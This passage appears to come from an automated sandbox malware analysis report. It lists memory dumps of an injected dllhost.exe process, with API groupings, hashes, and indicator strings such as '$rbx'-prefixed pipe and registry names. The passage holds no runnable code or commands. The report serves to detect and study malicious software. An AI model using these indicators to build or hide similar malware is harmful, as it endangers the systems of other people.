                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 66df7686e373e6b0703641c3a1a2d3a01a2f924276f2e771d1b4803717236d9e
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 2D31FE39610BC586EB54DF22E94479D63A2B7C4FA5F48C13DAE4A43726EE39C4978600
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID:
                                                  • API String ID: 4184240511-0
                                                  • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                  • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                                  • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                  • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 4a2781f55ce4d218829d96b48c44c163d4583220ae7b79ceabd206b7a5d6e385
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: EAD18E32A047C0AAEB20DF65D5413ED77A2F785798F180129FE8957B9BEB34C496C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: e950133cc64b0bf9c756e9b050fd6aa49096f1d31f6117f5cd5d45d479bf7017
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: 34D17D3A6047C08AEB20DB65D4403DD77A2F7897A8F98C129FE8957B97EB35C482C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: fc028005dc750ec03548f7bf43347b12d4d0e140b149f322bb4c589a6e95c141
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: 5AD17E7270478886EB60EF65D4A03DD77A1F785798F180229FE8957B9BEB34C082C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: e831485c0bc4d227e87a5140ea49f35d87eba2b40be02787b1f71c7e7af64d67
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 18412F72214BC4D6E760CF61E44479E77A2F388B98F488129EE8907759EF3CC556CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: c1ad38091cd858f7ee158c40272fddf9c5b966641ce9c3225c56e71c8fa1deae
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 2F414F36614BC4D6E760CF21E4447AE77A2F388B98F48C129EE8907758EF39C546CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                  • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                                  • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                  • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$rbx-childproc
                                                  • API String ID: 166002920-1828357524
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: bbeca51580b396dafb86b956998b2e05c33cf578644dd1a48ade67878bde4867
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: DE113D31619B8092E7108B21F55479D7761F389B94F984229FE9D02AA9EF3DC156CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$rbx-childproc
                                                  • API String ID: 166002920-1828357524
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: af28c7787a8e59b9465463149b6944e95b3700b9414c312242eac058a816e0ab
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: CB113D356187C092E7108B21F55439D7771F389BA4F98C229FE9902AA9EF7DC146CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 702d1a2b6a2b77fa669f479ce1f33957d8ed2ce2c0078fee87a47ee3fafa64a5
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: CD818C31A087C1A6FA60AB66D4413ED639BABD5B84F5C813DBE4847797FB38D8478700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: d99235cdc05993c41fb060c54ae44cf2e397157ece6ee86aff317ccd65c835b6
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: B2819D396146C186FA60AB66D4513ED6293BBC5BB4F9CC03DBE4847797FA3AD8478300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: b920fa17ed4afdda0d8cfae514d0b361e9f8ff6db6eba7155a4ed0bf042bbd31
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: F3817C317046C986FA64AB66D8613DD6393ABC6780F5C813DBE09477E7FA38C95B8700
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229B31
                                                  • GetLastError.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: 391cf704cb4f92ff4a1b505e12524511f344734a0e05ad07313651760439eb3d
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 2E317035212680A5EE11DB16DA00BED2396BBC9BA0F5D463DFD1D47792FF38C4868710
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429B31
                                                  • GetLastError.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: a66865d9eaf0d5adb56efc8362a4dcb383f851798a24c0a88ea7806b2b1838dd
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 6331AD392126C091EE119B12EA007ED2796BB89BB4F9DC63CBD1D4B792FF39C4468310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 0c2e37dbc164343603d4ad7d5205c891ae89f708deb9fd064a44ac374ad0aec7
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: D8119031310B8082E7508B52EA5475D67A2F3C8BE4F48823CFE5E87B96EF39C5058740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 5dcfdee2eeb787bdf2f821f10ceee9ccb17ba2142b2a9ad0797cc2fda66b9c87
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: FD114F35210AC086E7508B62E95475D67B1F7D8BF4F48C22CFE5D87B96EB39C4158740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Delete$CloseEnumOpen
                                                  • String ID: SOFTWARE\$rbx-config
                                                  • API String ID: 3013565938-3990243012
                                                  • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                  • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 36ea7d26e62ca28bfa3b4e3a46fbd43fabea14f5e691a71912b48576972982ad
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: A3D17B76209B8895DB709B1AE49439E77A1F3C8B88F14012AFE8D477A6DF3CC552CB04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 3f6e4745aea0a7298c787884e47ede39e99b191d0718cbd86084dad7f098a0f6
